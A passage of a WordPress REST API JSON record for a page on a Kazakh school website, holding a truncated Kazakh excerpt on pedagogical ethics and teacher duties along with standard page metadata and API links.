\u041f\u0435\u0434\u0430\u0433\u043e\u0433\u0438\u043a\u0430\u043b\u044b\u049b \u044d\u0442\u0438\u043a\u0430 \u0435\u0440\u0435\u0436\u0435\u043b\u0435\u0440\u0456\u043d \u0441\u0430\u049b\u0442\u0430\u0439\u0434\u044b, \u0431\u0456\u043b\u0456\u043c \u0430\u043b\u0443\u0448\u044b\u043b\u0430\u0440\u0434\u044b\u04a3 \u04e9\u043c\u0456\u0440\u043b\u0456\u043a \u0434\u0430\u0493\u0434\u044b\u043b\u0430\u0440\u044b\u043d, \u049b\u04b1\u0437\u044b\u0440\u0435\u0442\u0442\u0435\u0440\u0456\u043d, \u0434\u0435\u0440\u0431\u0435\u0441\u0442\u0456\u0433\u0456\u043d, \u0448\u044b\u0493\u0430\u0440\u043c\u0430\u0448\u044b\u043b\u044b\u049b \u049b\u0430\u0431\u0456\u043b\u0435\u0442\u0442\u0435\u0440\u0456\u043d \u0434\u0430\u043c\u044b\u0442\u0430\u0434\u044b; v \u0421\u0430\u0431\u0430\u049b \u043a\u0435\u0441\u0442\u0435\u0441\u0456\u043d\u0435 \u0441\u04d9\u0439\u043a\u0435\u0441 \u0441\u0430\u0431\u0430\u049b \u0436\u04d9\u043d\u0435 \u0431\u0430\u0441\u049b\u0430 \u0434\u0430 \u0441\u0430\u0431\u0430\u049b\u0442\u0430\u0440 \u04e9\u0442\u043a\u0456\u0437\u0435\u0434\u0456, \u043e\u049b\u044b\u0442\u044b\u043b\u0430\u0442\u044b\u043d \u043f\u04d9\u043d\u043d\u0456\u04a3 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-229","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=\/wp\/v2\/pages\/229","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=229"}],"version-history":[{"count":4,"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=\/wp\/v2\/pages\/229\/revisions"}],"predecessor-version":[{"id":334,"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=\/wp\/v2\/pages\/229\/revisions\/334"}],"wp:attachment":[{"href":"https:\/\/115-astana.edu.kz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=229"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}